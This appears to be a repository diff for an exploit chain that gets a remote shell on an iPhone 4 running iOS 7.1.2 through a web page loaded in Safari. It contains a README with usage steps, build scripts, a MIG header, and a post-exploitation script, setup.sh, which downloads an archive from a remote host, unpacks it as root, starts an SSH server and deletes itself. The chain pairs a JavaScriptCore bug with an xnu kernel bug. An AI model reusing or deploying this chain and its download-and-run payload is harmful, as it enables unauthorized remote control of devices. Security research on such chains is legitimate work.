iPhone3,1 iOS 7.1.2 remote shell via builtin Safari browser

iPhone3_1_shell/LICENSE

@@ -0,0 +1,22 @@
+Copyright 2020, https://github.com/kudima
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+   list of conditions and the following disclaimer.
+2. Redistributions in binary form must reproduce the above copyright notice,
+   this list of conditions and the following disclaimer in the documentation
+   and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
+ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
+ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+

iPhone3_1_shell/README.md

@@ -0,0 +1,71 @@
+# Description
+
+This is a combination of two exploits to spawn ssh server on iPhone 4
+(iPhone 3,1) running iOS 7.1.2 by loading a html document into
+builtin Safari browser.
+
+First one is using a bug in JavaScriptCore engine described in  
+https://www.thezdi.com/blog/2018/4/12/inverting-your-assumptions-a-guide-to-jit-comparisons
+by Jasiel Spelman to get initial code execution under MobileSafari process.
+
+The second one is a vulnerability in xnu described by Ian Beer in
+https://bugs.chromium.org/p/project-zero/issues/detail?id=882. It is used
+to obtain arbitrary kernel read/write.
+
+# Files
+
+* *build* --- a bash script to build the binary code.
+* *clean* --- a bash script to clean up build artifacts
+* *dep*   --- contains files we want to deploy once we get read/write 
+	  access to the file system.
+* *index.html* --- Mobile Safari exploit.
+* *loader.c* --- small stab to map mach-o file into rwx memory end load
+		it via dyld.
+* *macho_to_bin.py* --- a python scrip used to extract binary code
+		for our macho loader.
+* *macho.m* --- privilege escalation (PE) exploit.
+* *utils.m*  --- utility functions used by our PE.
+* *offsets.h* --- contains kernel structures offsets.
+* *shell.m* --- post exploitation.
+* *task.c* --- skimmed file from original Ian Beer report to call *mach_ports_register* trap.
+* *tools* --- some command line tools we deploy along with core utils.
+
+# Post exploitation
+
+Once the file system is remounted the exploit downloads a shell,
+shell script, tar utility, simple tool to download files via
+http called iget and xz archive decompressor.
+
+The shell script downloads a tar containing gnu core utils, grep, findutils
+and a dropbear ssh server. It extracts files from the archive and spawns ssh server.
+
+We use https://github.com/tpoechtrager/cctools-port to compile all the tools 
+on a machine running debian linux. The cctools provides arm-apple-darwin11-clang
+compiler to build binaries for iOS.
+
+To be able to compile all the tools we need an extra header
+[crt_externs.h](https://opensource.apple.com/source/Libc/Libc-320/include/crt_externs.h)
+to be placed under <SDK Path>/usr/include.
+
+As shell we use [oksh](https://github.com/ibara/oksh). 
+It compiled without any issues in our setup:
+	CC=arm-apple-darwin11-clang ./configure --host=arm-apple-darwin11
+	make
+
+Same applies to: [gnu core utils](https://ftp.gnu.org/gnu/coreutils/coreutils-8.32.tar.xz),
+[grep](https://ftp.gnu.org/gnu/grep/grep-3.4.tar.xz),
+[findutils](https://ftp.gnu.org/pub/gnu/findutils/findutils-4.7.0.tar.xz) and
+[xz](https://tukaani.org/xz/xz-embedded-20120222.tar.gz).
+
+To build [dropbear](https://matt.ucc.asn.au/dropbear/releases/dropbear-2019.78.tar.bz2) ssh server:
+	CC=arm-apple-darwin11-clang ./configure --host=arm-apple-darwin11 --disable-wtmp --disable-lastlog
+	make program=DROPBEAR
+
+# Usage
+
+To spawn an ssh server on iPhone3,1 running iOS 7.1.2, you need to adjust 
+*HOST_ROOT* definition in shell.m file to the url where you want to host the exploits. 
+Then use *build* script to compile the project. Host the root directory of the project as the url *HOST_ROOT*
+and visit the url via built in Mobile Safari browser and wait till it closes. In case of failure
+you might ether see a diagnostic popup in the browser or experience phone reboot.
+

iPhone3_1_shell/__task.h

@@ -0,0 +1,49 @@
+#ifndef	_task_user_
+#define	_task_user_
+
+/* Module task */
+
+#include <string.h>
+#include <mach/ndr.h>
+#include <mach/boolean.h>
+#include <mach/kern_return.h>
+#include <mach/notify.h>
+#include <mach/mach_types.h>
+#include <mach/message.h>
+#include <mach/mig_errors.h>
+#include <mach/port.h>
+
+#ifndef KERNEL
+#if defined(__has_include)
+#if __has_include(<mach/mig_voucher_support.h>)
+#ifndef USING_VOUCHERS
+#define USING_VOUCHERS
+#endif
+#ifndef __VOUCHER_FORWARD_TYPE_DECLS__
+#define __VOUCHER_FORWARD_TYPE_DECLS__
+#ifdef __cplusplus
+extern "C" {
+#endif
+	extern boolean_t voucher_mach_msg_set(mach_msg_header_t *msg) __attribute__((weak_import));
+#ifdef __cplusplus
+}
+#endif
+#endif // __VOUCHER_FORWARD_TYPE_DECLS__
+#endif // __has_include(<mach/mach_voucher_types.h>)
+#endif // __has_include
+#endif // !KERNEL
+
+#ifdef  __MigPackStructs
+#pragma pack(4)
+#endif
+	typedef struct {
+		mach_msg_header_t Head;
+		NDR_record_t NDR;
+		kern_return_t RetCode;
+	} __Reply__mach_ports_register_t __attribute__((unused));
+#ifdef  __MigPackStructs
+#pragma pack()
+#endif
+
+
+#endif

iPhone3_1_shell/build

@@ -0,0 +1,8 @@
+#!/bin/sh
+./clean
+
+arm-apple-darwin11-clang -shared -O0 -mthumb loader.c -o loader
+arm-apple-darwin11-clang -O0 -fmodules -mthumb macho.m task.c utils.m shell.m patchfinder.c -o macho 
+
+python macho_to_bin.py loader
+base64 -w 0 macho >macho.b64

iPhone3_1_shell/clean

@@ -0,0 +1,2 @@
+#!/bin/sh
+rm -f loader *.b64 *.bin macho

iPhone3_1_shell/dep/setup.sh

@@ -0,0 +1,24 @@
+cd /
+iget $1 /tmp/core.tar.xz
+tar -xJf /tmp/core.tar.xz
+rm /tmp/core.tar
+
+chown -R root:wheel /bin/
+chown -R root:wheel /lib/
+chmod -R 755 /bin/
+chmod -R 755 /lib/
+
+rm -rf /etc/dropbear/
+rm -rf /var/dropbear/
+
+mkdir /var/dropbear
+ln -s /var/dropbear /etc/dropbear
+
+chown root:wheel /etc/dropbear
+chown root:wheel /var/dropbear
+
+chmod 755 /etc/dropbear
+chmod 755 /var/dropbear
+
+dropbear -R
+rm $0